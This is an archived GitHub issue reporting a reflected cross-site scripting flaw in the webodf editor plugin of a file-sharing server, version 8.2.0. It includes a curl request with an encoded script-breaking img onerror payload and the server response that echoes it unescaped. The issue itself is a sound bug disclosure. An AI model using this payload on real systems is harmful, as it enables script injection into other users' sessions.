This repository has been archived by the owner on Nov 25, 2020. It is now read-only.
bug in validate/sanitize requests in webodf #1428
Comments
Sign up for free
to subscribe to this conversation on GitHub.
Already have an account?
Sign in.
Accessing:
curl -v "https://mypydio/plugins/editor.webodf/frame.php?file=1e8ali%3C/script%3E%3Cimg/src=%27x%27/onerror=alert(document.location)%3E"
output:
< HTTP/1.1 200 OK
<script src="webodf/webodf.js" type="text/javascript" charset="utf-8"></script> <script type="text/javascript" charset="utf-8"> function init() { var odfelement = document.getElementById("odf"); window.odfcanvas = new odf.OdfCanvas(odfelement); window.odfcanvas.load("../../" + window.parent.ajxpServerAccessPath + "&get_action=download&file=1e8ali</script>< Date: Thu, 12 Jul 2018 15:04:55 GMT
< Server: Apache
< X-Frame-Options: SAMEORIGIN
< Strict-Transport-Security: max-age=15768000; includeSubdomains;
< Vary: Accept-Encoding
< Content-Length: 965
< Content-Type: text/html; charset=UTF-8
<
"); //window.odfcanvas.setEditable(true); /* odfcanvas.odfContainer().save(function(err){ console.log(err); }); */ } window.setTimeout(init, 0); </script> <style type="text/css"> .shadow_class{ box-shadow: 1px 1px 6px black; } </style> Since the access isn't authenticated should output just a redirect to the login page. My version is 8.2.0The text was updated successfully, but these errors were encountered: